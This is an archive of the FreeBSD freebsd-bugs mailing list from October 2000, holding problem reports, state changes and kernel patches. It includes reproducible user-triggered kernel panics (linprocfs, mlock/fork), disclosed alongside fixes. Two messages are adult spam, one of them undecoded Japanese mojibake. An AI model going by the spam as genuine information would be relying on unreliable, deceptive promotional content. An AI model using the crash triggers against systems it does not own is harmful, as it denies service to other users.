ports/22280 ports Upgrade ddup port to latest version (prev o [2000/10/25] misc/22288 mod_perl dependancy missing from p5-HTML- o [2000/10/25] misc/22290 mi ordenador al cabo de un tiempo no arra o [2000/10/25] gnu/22293 make.conf: NOSUIDPERL vs. src/gnu/usr.bin o [2000/10/25] ports/22295 ports lua 4.0 beta port o [2000/10/25] ports/22296 ports New port: cannadic - Dictionary of Canna o [2000/10/25] ports/22298 ports Move devel/p5-IniConf to devel/p5-Config- o [2000/10/25] ports/22303 ports New port: urlendec. Contains urlencode an o [2000/10/26] conf/22308 mounting NFS during boot blocks if host m o [2000/10/26] ports/22312 andreas Update Port: sysutils/webadmin to v 0.82 o [2000/10/26] alpha/22314 alpha tcpdump causes unaligned accesses o [2000/10/26] ports/22316 ports [PATCH] samba port in a jail(2) environme o [2000/10/26] ports/22317 ports update devel/ftnchek port o [2000/10/26] ports/22318 ports Update port: graphics/tgif-nls to 4.1.39 o [2000/10/26] ports/22327 ports MAINTAINER UPDATE: audio/lopster 0.9.4->0 o [2000/10/26] ports/22330 ports New port: evas-0.0.1 o [2000/10/26] misc/22331 request to add if=/etc/issue to /etc/gett o [2000/10/26] misc/22332 request to add vtys to /etc/ttys o [2000/10/26] docs/22333 doc share/doc/smm/07.lpd building moved in 3. o [2000/10/26] ports/22334 ports New port: geist-0.0.3 o [2000/10/26] ports/22336 ports New port: scrot-0.1 o [2000/10/26] docs/22338 asmodai ugen(4) man page missing o [2000/10/26] conf/22339 request to add new kernel config "GENLINT o [2000/10/26] ports/22340 ports New port: mmix, a RISC computer designed o [2000/10/26] ports/22341 ports New port: chinese/netscape47-communicator o [2000/10/26] ports/22342 ports New port: chinese/netscape47-navigator o [2000/10/27] ports/22346 ports Incorrect plist for ports/net/nocol o [2000/10/27] bin/22347 dd copies incorrect data after 2^32 bytes o [2000/10/27] ports/22349 ports new port: rotate o [2000/10/27] ports/22350 ports port update: security/mhash; assume maint o [2000/10/27] bin/22351 sed(1) fails with backslash on buffer bou o [2000/10/27] ports/22353 ports Gabber coring upon startup o [2000/10/28] ports/22370 ports emulators/bochs don't build o [2000/10/28] ports/22378 ports ports/lang/ratfor missing file on master f [2000/10/28] ports/22379 ports New port: libudbc f [2000/10/28] ports/22381 ports New port: misc/mango o [2000/10/28] ports/22382 ports Update of fetchmail port o [2000/10/28] misc/22383 bmah typo (LU-ATX -> LUA-TX) o [2000/10/29] ports/22393 ports New port: Ipe-5.0: Interactive Picture Ed o [2000/10/29] ports/22395 ports update of ports/audio/napster o [2000/10/29] ports/22396 ports portcheckout fails with new port layout o [2000/10/29] ports/22399 msmith PIB 1.2 still looks for MD5 info in files o [2000/10/29] ports/22406 ports removing the port as discussed a while ag o [2000/10/29] ports/22407 ports Request to add ports/chinese/rxvt26-big5 o [2000/10/29] ports/22408 ports request to add ports/chinese/rxvt26-gb o [2000/10/29] ports/22409 ports Update port: mail/postfix-current o [2000/10/30] ports/22412 ports two extraneous ports and one name change o [2000/10/30] ports/22414 ports www/netscape47-communicator and dependent o [2000/10/30] docs/22419 doc stale URL in the FreeBSD Documentation Pr 1696 problems total. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 30 13:30: 6 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 099A337B4D7 for ; Mon, 30 Oct 2000 13:30:01 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA59705; Mon, 30 Oct 2000 13:30:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id A7CE637B479; Mon, 30 Oct 2000 13:26:30 -0800 (PST) Message-Id: <20001030212630.A7CE637B479@hub.freebsd.org> Date: Mon, 30 Oct 2000 13:26:30 -0800 (PST) From: amu@tr.debian.net To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/22428: FTP: Mirror-TR down Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 22428 >Category: misc >Synopsis: FTP: Mirror-TR down >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: doc-bug >Submitter-Id: current-users >Arrival-Date: Mon Oct 30 13:30:00 PST 2000 >Closed-Date: >Last-Modified: >Originator: Andreas Mueller >Release: FreeBSD 4.1-RELEASE i386 >Organization: >Environment: FreeBSD hitit.bimel.com.tr 4.1-RELEASE FreeBSD 4.1-RELEASE #1: Mon Sep 18 11:45:07 EEST 2000 root@hitit.bimel.com.tr:/usr/src/sys/compile/hitit2 i386 >Description: Tried to access the Turkish-FTP-Mirror host is down since days No public ftp-access :( Since we're running a local installserver, we need some updates. >How-To-Repeat: >Fix: mirroring from ftp.freebsd.org, sorry for traffic >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 30 13:30: 6 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id E0BD337B4C5 for ; Mon, 30 Oct 2000 13:30:00 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id NAA59696; Mon, 30 Oct 2000 13:30:00 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id C061F37B479; Mon, 30 Oct 2000 13:22:15 -0800 (PST) Message-Id: <20001030212215.C061F37B479@hub.freebsd.org> Date: Mon, 30 Oct 2000 13:22:15 -0800 (PST) From: amu@tr.debian.net To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/22427: WWW: Mirror-TR2 down Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 22427 >Category: misc >Synopsis: WWW: Mirror-TR2 down >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: doc-bug >Submitter-Id: current-users >Arrival-Date: Mon Oct 30 13:30:00 PST 2000 >Closed-Date: >Last-Modified: >Originator: Andreas Mueller >Release: FreeBSD 4.1-RELEASE i386 >Organization: >Environment: FreeBSD hitit.bimel.com.tr 4.1-RELEASE FreeBSD 4.1-RELEASE #1: Mon Sep 18 11:45:07 EEST 2000 root@hitit.bimel.com.tr:/usr/src/sys/compile/hitit2 i386 >Description: Tried to access the Turkish-Mirror/2 host is down since days >How-To-Repeat: >Fix: >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 30 14: 4:31 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3921937B479; Mon, 30 Oct 2000 14:04:29 -0800 (PST) Received: (from johan@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA72544; Mon, 30 Oct 2000 14:04:29 -0800 (PST) (envelope-from johan@FreeBSD.org) Date: Mon, 30 Oct 2000 14:04:29 -0800 (PST) From: Message-Id: <200010302204.OAA72544@freefall.freebsd.org> To: mi@aldan.algebra.com, johan@FreeBSD.org, freebsd-bugs@FreeBSD.org, obrien@FreeBSD.org Subject: Re: bin/4545: f77 will only call `cc', no com-line option, will not check the environment Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: f77 will only call `cc', no com-line option, will not check the environment State-Changed-From-To: open->closed State-Changed-By: johan State-Changed-When: Mon Oct 30 11:07:57 PST 2000 State-Changed-Why: We are now using GCC 2.95.1 in stable and 2.96 in current. This means alot has happened in the gcc/f77 area. Please report this, if it still exists in the new version, and new problem to the GCC maintainers at GNU (see src/contrib/gcc/BUGS for details). Over to our GCC guru. Responsible-Changed-From-To: freebsd-bugs->obrien Responsible-Changed-By: johan Responsible-Changed-When: Mon Oct 30 11:07:57 PST 2000 Responsible-Changed-Why: http://www.freebsd.org/cgi/query-pr.cgi?pr=4545 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 30 16: 4: 3 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 6FBE837B479; Mon, 30 Oct 2000 16:04:02 -0800 (PST) Received: (from jkh@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id QAA17374; Mon, 30 Oct 2000 16:04:02 -0800 (PST) (envelope-from jkh@FreeBSD.org) Date: Mon, 30 Oct 2000 16:04:02 -0800 (PST) From: Message-Id: <200010310004.QAA17374@freefall.freebsd.org> To: ambrisko@whistle.com, jkh@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/22352: Fixit doesn't quite work on serial console - sysinstall bug. Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Fixit doesn't quite work on serial console - sysinstall bug. State-Changed-From-To: open->closed State-Changed-By: jkh State-Changed-When: Mon Oct 30 16:03:53 PST 2000 State-Changed-Why: Committed, thanks http://www.freebsd.org/cgi/query-pr.cgi?pr=22352 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 30 17:12:39 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from tomts6-srv.bellnexxia.net (smtp.bellnexxia.net [209.226.175.26]) by hub.freebsd.org (Postfix) with ESMTP id 69A2837B479 for ; Mon, 30 Oct 2000 17:12:35 -0800 (PST) Received: from FreeBSD.ORG ([216.209.81.136]) by tomts6-srv.bellnexxia.net (InterMail vM.4.01.03.00 201-229-121) with SMTP id <20001031011233.RRJO10530.tomts6-srv.bellnexxia.net@FreeBSD.ORG> for ; Mon, 30 Oct 2000 20:12:33 -0500 From: Mary@FreeBSD.ORG Reply-To: group3us@yahoo.com X-Mailer: EzyMassMailer V2.xx Date: 30 Oct 2000 To: freebsd-bugs@FreeBSD.ORG Subject: Important Text - ebay4sex gets laid Message-Id: <20001031011233.RRJO10530.tomts6-srv.bellnexxia.net@FreeBSD.ORG> Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org We're not weird......we're sexy!!!!!!!! http://www.ebay4sex.com http://www.net4inc.com eBay4Sex goes LIVE! Toronto, Ontario, October 26, 2000 – SPE Group introduces leader in Adult entertainment auctions. This past weekend at Toronto’s ‘Everything to do with Sex’ show, an online auction catering to the truly authentic amateur and fetish market announced its arrival! Developed by partnering company Rakil.com and served by leading Canadian portal provider Net4Inc.com – eBay4Sex is nothing short of a techie-miracle, and Adult wonderland of the rare, used and amateur. The original launch will see the first 10,000 registering visitors to the auction, be given FULL access to one of the net’s leading Adult Entertainment web portals, http://www.modeltraders.com. As a result of many partnerships from Russia, Iran, Canada and USA, eBay4Sex offers leading edge functionality and certified security for all online transactions. The ability for users to pay each other for products has almost been completed and we look forward to this attraction. Original product line will be offered from leading manufactures such as the ‘BenWa’ - Sex toy and paraphernalia products as well as TotallyAmatuer.com Videos. Stay tuned as eBay4Sex sure to become the online auction for the adult entertainment industry. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 30 17:20:28 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from proxy.mailsender (unknown [211.5.191.206]) by hub.freebsd.org (Postfix) with ESMTP id 525D737B479; Mon, 30 Oct 2000 17:20:23 -0800 (PST) Received: from add ([10.0.0.100]) by proxy.mailsender (8.9.3/8.9.3) with SMTP id DAA07134; Tue, 31 Oct 2000 03:07:26 +0900 From: add@nozokibeya.com MIME-Version: 1.0 Date: Tue, 31 Oct 2000 03:07:57 +0900 Subject: =?ISO-2022-JP?B?GyRCJDMkcyRQJHMkTyEqGyhC?= To: add@nozokibeya.com Message-ID: Content-Type: text/plain; charset=iso-2022-jp Content-Transfer-Encoding: 7bit X-Mailer: JsvMail 3.0 (Shuriken Pro) X-Priority: 3 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org $B$3$s$P$s$O!*FMA3$N%a!<%k$G?=$7Lu$4$6$$$^$;$s!#(B $B$3$N%a!<%k$,%"%@%k%H%5%$%H$K6=L#$N$J$$J}$d#1#8:PL$K~$NJ}(B $B$^$?!"$^$C$?$/I,MW$N$J$$J}$N$H$3$m$KFO$$$?>l9g$K$O(B $B62$lF~$j$^$9$,!":o=|$7$F$$$?$@$-$^$9$h$&$*4j$$$$$?$7$^$9!#(B $B%j%"%k%?%$%`1GA|!*$N@8Ep;#!&@8EpD0(B $B$7$+$b"M!z!z!z$3$l$>K\J*$NF02h!*F0$/1GA|$r=i8x3+(B!!$B!z!z!z(B $B$"$J$?$O%^%5%7%/K\J*$N%9%H!<%+!<$G$9!#(B $B%@%$%"%d%k#Q(B2$B$d9q:]2s@~$O0l@Z;HMQ$7$F$$$^$;$s!*(B $B$9$3$V$k%Y%C%T%s$5$s@*$>$m$$!*!*K\Ev$K!"$3$N=w$N;R$N%$%$%H%3%m$,8+$($k$J$s$F(B $B>iCL$@$H;W$C$F$7$^$&$/$i$$!D$@$^$5$l$k$J$s$F$"$j$($J$$!*!*(B $BD6CQ$:$+$7$$=w$N;R$?$A$N;d@83h(B($B@-@83h(B)$B$r!y:#$3$N;~4V$,%*%9%9%a!y(B $B$?$!!A$C$W$j$H$4Mw$/$@$5$$!#(B http://www.nozokibeya.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 30 17:44:57 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from wa4phy.dyndns.org (cc449817-a.mrtnz1.ga.home.com [24.12.79.51]) by hub.freebsd.org (Postfix) with ESMTP id 4743037B4C5 for ; Mon, 30 Oct 2000 17:44:54 -0800 (PST) Received: from wa4phy.dyndns.org (localhost [127.0.0.1]) by wa4phy.dyndns.org (8.11.0/8.11.0) with ESMTP id e9V1iq700350 for ; Mon, 30 Oct 2000 20:44:53 -0500 (EST) (envelope-from sam@wa4phy.dyndns.org) Message-ID: <39FE2414.EE053F29@wa4phy.dyndns.org> Date: Mon, 30 Oct 2000 20:44:52 -0500 From: Sam Drinkard Organization: You Gotta Be Kiddin! X-Mailer: Mozilla 4.75 [en] (X11; U; FreeBSD 4.1.1-RELEASE i386) X-Accept-Language: en, ja MIME-Version: 1.0 To: freebsd-bugs@freebsd.org Subject: Repeatable bug Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Just joined the list, and hope this is not the wrong place to ask or post this info. Not for sure if the bug is in the OS or in Netscape, but here it is.. 4.1.1-R on a P266/128/ide/generic box. Netscape 4.75 from the ports collection, (the bsd version). Was attempting to do a "find" on this particular page http://acfchefs.org/pubs/copy9910.html for "michael ciuffetti". Machine appeared to do the search, but wedged, and rebooted. Repeatable from here every time with no warnings, messages -- nothing. wedge then reboot. Also tried it with netscape running on my AlphaServer but using the display on this machine. Same results. This machine wedged, then rebooted. In that particular session, the AS tried to drop into gdb, and printed out bunches of stuff, but I couldn't capture them. Has anybody else seen behavior such as this repeatable every time? Sam To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 30 19: 7:57 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from midten.fast.no (midten.fast.no [213.188.8.11]) by hub.freebsd.org (Postfix) with ESMTP id 16FE637B479; Mon, 30 Oct 2000 19:07:50 -0800 (PST) Received: from fast.no (IDENT:tegge@midten.fast.no [213.188.8.11]) by midten.fast.no (8.9.3/8.9.3) with ESMTP id EAA19594; Tue, 31 Oct 2000 04:07:46 +0100 (CET) Message-Id: <200010310307.EAA19594@midten.fast.no> To: johan@FreeBSD.org Cc: freebsd-bugs@FreeBSD.org Subject: Re: kern/2840: mlock+minherit+fork+munlock causes panics or freezes From: Tor.Egge@fast.no In-Reply-To: Your message of "Fri, 27 Oct 2000 13:13:48 -0700 (PDT)" References: <200010272013.NAA78899@freefall.freebsd.org> X-Mailer: Mew version 1.70 on Emacs 19.34.1 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Date: Tue, 31 Oct 2000 04:07:46 +0100 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Synopsis: mlock+minherit+fork+munlock causes panics or freezes > > State-Changed-From-To: open->feedback > State-Changed-By: johan > State-Changed-When: Fri Oct 27 13:10:31 PDT 2000 > State-Changed-Why: > Hi Tor > > Is this still a problem in more recent version of FreeBSD > (for example 4.x or current). This is still a problem: not# ./minherit minherit: a=0x8055000, alen=0x100000, res=0, errno=0 mlock: res=0, errno=0 pass 0 munlock: res=0, errno=0 munlock: res=0, errno=0 panic: vm_page_unwire: invalid wire count: 0 cpuid = 1; lapic.id = 00000000 Debugger("panic") CPU1 stopping CPUs: 0x00000001... stopped. Stopped at Debugger+0x38: movb $0,in_Debugger.837 db> trace Debugger(c02c9181) at Debugger+0x38 panic(c02e7280,0,bb28000,e4b3eea0,c0270daf) at panic+0xb8 vm_page_unwire(c0840d24,1,dfba336c,8166000,0) at vm_page_unwire+0x9f vm_fault_unwire(dfba3300,8166000,8256000,e4b7f540,e4b3eeec) at vm_fault_unwire+0x53 vm_map_entry_unwire(dfba3300,e4b82b10) at vm_map_entry_unwire+0x15 vm_map_delete(dfba3300,8166000,8256000,8166000,dfba3300) at vm_map_delete+0xca vm_map_remove(dfba3300,8166000,8256000,c034f840,0) at vm_map_remove+0x6a obreak(dfb9d340,e4b3ef80,8054020,100000,8256000) at obreak+0xb7 syscall2(2f,2f,2f,8256000,100000) at syscall2+0x31c Xint0x80_syscall() at Xint0x80_syscall+0x24 db> > The supplied how-to-repeate program does not compile > on a 4.1-STABLE system. Can you please close the PR > if the problem is solved. The content of vm/vm_inherit.h has been moved into vm/vm.h. Just remove the #include line. - Tor Egge To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 30 20:20: 6 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id D35BE37B4CF for ; Mon, 30 Oct 2000 20:20:01 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id UAA15792; Mon, 30 Oct 2000 20:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id DC21537B4CF; Mon, 30 Oct 2000 20:13:44 -0800 (PST) Message-Id: <20001031041344.DC21537B4CF@hub.freebsd.org> Date: Mon, 30 Oct 2000 20:13:44 -0800 (PST) From: rsowders@usgs.gov To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: misc/22433: crt commit is bogus Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 22433 >Category: misc >Synopsis: crt commit is bogus >Confidential: no >Severity: non-critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Oct 30 20:20:01 PST 2000 >Closed-Date: >Last-Modified: >Originator: Robert Sowders >Release: 4.1.1 stable >Organization: USGS >Environment: FreeBSD xxxxx 4.1.1-STABLE FreeBSD 4.1.1-STABLE #0: Mon Oct 30 19:18:57 PST 2000 root@xxxx.wr.usgs.gov:/usr/obj/src/sys/GENERIC i386 >Description: make buildworld results in a Stop in /usr/src/games/fortune/strfile, Error Code 1 -------------------------------------------------------------- >How-To-Repeat: make buildworld >Fix: >Release-Note: >Audit-Trail: >Unformatted: >>> Rebuilding the temporary build tree -------------------------------------------------------------- rm -rf /usr/obj/usr/src/i386 mkdir -p /usr/obj/usr/src/i386/usr/bin mkdir -p /usr/obj/usr/src/i386/usr/lib/compat/aout mkdir -p /usr/obj/usr/src/i386/usr/games mkdir -p /usr/obj/usr/src/i386/usr/libdata/ldscripts mkdir -p /usr/obj/usr/src/i386/usr/libexec/elf mkdir -p /usr/obj/usr/src/i386/usr/sbin mkdir -p /usr/obj/usr/src/i386/usr/share/misc mkdir -p /usr/obj/usr/src/i386/usr/include/arpa mkdir -p /usr/obj/usr/src/i386/usr/include/g++/std mkdir -p /usr/obj/usr/src/i386/usr/include/objc mkdir -p /usr/obj/usr/src/i386/usr/include/protocols mkdir -p /usr/obj/usr/src/i386/usr/include/readline mkdir -p /usr/obj/usr/src/i386/usr/include/rpc mkdir -p /usr/obj/usr/src/i386/usr/include/rpcsvc mkdir -p /usr/obj/usr/src/i386/usr/include/openssl mkdir -p /usr/obj/usr/src/i386/usr/include/security mkdir -p /usr/obj/usr/src/i386/usr/include/ss ln -sf /usr/src/sys /usr/obj/usr/src/i386/sys -------------------------------------------------------------- >>> stage 1: bootstrap tools -------------------------------------------------------------- cd /usr/src; MAKEOBJDIRPREFIX=/usr/obj/usr/src/i386 DESTDIR=/usr/obj/usr/src/i386 INSTALL="sh /usr/src/tools/install.sh" MACHINE_ARCH=i386 TOOLS_PREFIX=/usr/obj/usr/src/i386 PATH=/usr/obj/usr/src/i386/usr/sbin:/usr/obj/usr/src/i386/usr/bin:/usr/obj/ usr/src/i386/usr/games:/sbin:/bin:/usr/sbin:/usr/bin make -f Makefile.inc1 -DNOMAN -DNOINFO -DNOHTML bootstrap-tools cd /usr/src/games/fortune/strfile; make obj; make depend; make all; make install /usr/obj/usr/src/i386/usr/src/games/fortune/strfile created for /usr/src/games/fortune/strfile rm -f .depend mkdep -f .depend -a -I/usr/obj/usr/src/i386/usr/include /usr/src/games/fortune/strfile/strfile.c cd /usr/src/games/fortune/strfile; make _EXTRADEPEND echo strfile: /usr/obj/usr/src/i386/usr/lib/libc.a >> .depend cc -O -pipe -Wall -I/usr/obj/usr/src/i386/usr/include -c /usr/src/games/fortune/strfile/strfile.c cc -O -pipe -Wall -I/usr/obj/usr/src/i386/usr/include -o strfile strfile.o *** Error code 1 Stop in /usr/src/games/fortune/strfile. *** Error code 1 Stop in /usr/src. *** Error code 1 Stop in /usr/src. *** Error code 1 Stop in /usr/src. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 30 20:59:30 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from midten.fast.no (midten.fast.no [213.188.8.11]) by hub.freebsd.org (Postfix) with ESMTP id A901437B479; Mon, 30 Oct 2000 20:59:27 -0800 (PST) Received: from fast.no (IDENT:tegge@midten.fast.no [213.188.8.11]) by midten.fast.no (8.9.3/8.9.3) with ESMTP id FAA21495; Tue, 31 Oct 2000 05:59:26 +0100 (CET) Message-Id: <200010310459.FAA21495@midten.fast.no> To: johan@FreeBSD.org Cc: freebsd-bugs@FreeBSD.org Subject: Re: kern/2840: mlock+minherit+fork+munlock causes panics or freezes From: Tor.Egge@fast.no In-Reply-To: Your message of "Tue, 31 Oct 2000 04:07:46 +0100" X-Mailer: Mew version 1.70 on Emacs 19.34.1 Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit Date: Tue, 31 Oct 2000 05:59:25 +0100 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > Hi Tor > > > > Is this still a problem in more recent version of FreeBSD > > (for example 4.x or current). > > This is still a problem: Here is a suggested fix. vmspace_fork() didn't clear the MAP_ENTRY_USER_WIRED flag on the new map entries. Index: vm_map.c =================================================================== RCS file: /home/ncvs/src/sys/vm/vm_map.c,v retrieving revision 1.191 diff -u -r1.191 vm_map.c --- vm_map.c 2000/10/04 01:29:17 1.191 +++ vm_map.c 2000/10/31 04:52:44 @@ -2149,6 +2149,7 @@ */ new_entry = vm_map_entry_create(new_map); *new_entry = *old_entry; + new_entry->eflags &= ~MAP_ENTRY_USER_WIRED; new_entry->wired_count = 0; /* @@ -2175,6 +2176,7 @@ */ new_entry = vm_map_entry_create(new_map); *new_entry = *old_entry; + new_entry->eflags &= ~MAP_ENTRY_USER_WIRED; new_entry->wired_count = 0; new_entry->object.vm_object = NULL; vm_map_entry_link(new_map, new_map->header.prev, - Tor Egge To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Oct 30 22:20:16 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 43D4737B4FE for ; Mon, 30 Oct 2000 22:20:01 -0800 (PST) Received: (from gnats@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id WAA64550; Mon, 30 Oct 2000 22:20:01 -0800 (PST) (envelope-from gnats@FreeBSD.org) Received: by hub.freebsd.org (Postfix, from userid 32767) id B000B37B479; Mon, 30 Oct 2000 22:18:48 -0800 (PST) Message-Id: <20001031061848.B000B37B479@hub.freebsd.org> Date: Mon, 30 Oct 2000 22:18:48 -0800 (PST) From: iwaki@bc.niigata-u.ac.jp To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-1.0 Subject: kern/22435: linprocfs causes system down and reboot Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Number: 22435 >Category: kern >Synopsis: linprocfs causes system down and reboot >Confidential: no >Severity: critical >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Oct 30 22:20:01 PST 2000 >Closed-Date: >Last-Modified: >Originator: Mamoru Iwaki >Release: FreeBSD 4.1.1-STABLE >Organization: Niigata University >Environment: FreeBSD mi000.merlin.gs.niigata-u.ac.jp 4.1.1-STABLE FreeBSD 4.1.1-STABLE #0: Tue Oct 31 14:34:58 JST 2000 root@mi000.merlin.gs.niigata-u.ac.jp:/usr/obj/amd/mi004/home2/FreeBSD-src/stable4/src/sys/MI i386 >Description: Using linprocfs on 4.1.1-STABLE system, % cat /compat/linux/proc/stat or % cat /compat/linux/proc/uptime cause a panic with the following message Fatal trap 18: integer divide fault while in kernel mode instruction pointer = 0x8:0xc0933030 stack pointer = 0x10:0xc60dddc8 frame pointer = 0x10:0xc60dde20 code segment = base 0x0, limit 0xfffff, type 0x1b = DPL 0, pres 1, def32 1, gran 1 processor eflags = interrupt enabled, resume, IOPL = 0 current process = 325 (cat) interrupt mask = none trap number = 18 panic: integer divide fault and then the system reboots immediately. At least, this problem has exist since 4.1.1-STABLE around 24 Oct., but around 17 Oct.. This is dangerous because every user can make system down easily. I heard that the CURRENT around 28 Oct. works good with the same operations, so this problem maybe exist only in 4.1.1-STABLE. >How-To-Repeat: Use the above commands on 4.1.1-STABLE around 24 Oct. >Fix: In private communication, assar@freebsd.org proposed the following patch, which looks working well. In src/sys/i386/linux/linprocfs, --- linprocfs_misc.c.org Fri Sep 22 17:01:45 2000 +++ linprocfs_misc.c Tue Oct 31 10:10:18 2000 @@ -65,8 +65,8 @@ #include -#define T2J(x) (((x) * 100) / stathz) -#define T2S(x) ((x) / stathz) +#define T2J(x) (((x) * 100) / (stathz ? stathz : hz)) /* ticks to jiffies */ +#define T2S(x) ((x) / (stathz ? stathz : hz)) /* ticks to seconds */ int linprocfs_domeminfo(curp, p, pfs, uio) >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 31 0:11:14 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 7820E37B479; Tue, 31 Oct 2000 00:11:13 -0800 (PST) Received: (from asmodai@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id AAA09535; Tue, 31 Oct 2000 00:11:13 -0800 (PST) (envelope-from asmodai@FreeBSD.org) Date: Tue, 31 Oct 2000 00:11:13 -0800 (PST) From: Message-Id: <200010310811.AAA09535@freefall.freebsd.org> To: asmodai@FreeBSD.org, freebsd-bugs@FreeBSD.org, obrien@FreeBSD.org Subject: Re: misc/22433: crt commit is bogus Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: crt commit is bogus Responsible-Changed-From-To: freebsd-bugs->obrien Responsible-Changed-By: asmodai Responsible-Changed-When: Tue Oct 31 00:10:25 PST 2000 Responsible-Changed-Why: David, could you please look into this? I noticed some subsequent commits from you after this, but am unsure what the current state is. Thanks. http://www.freebsd.org/cgi/query-pr.cgi?pr=22433 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Tue Oct 31 0:23:37 2000 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with 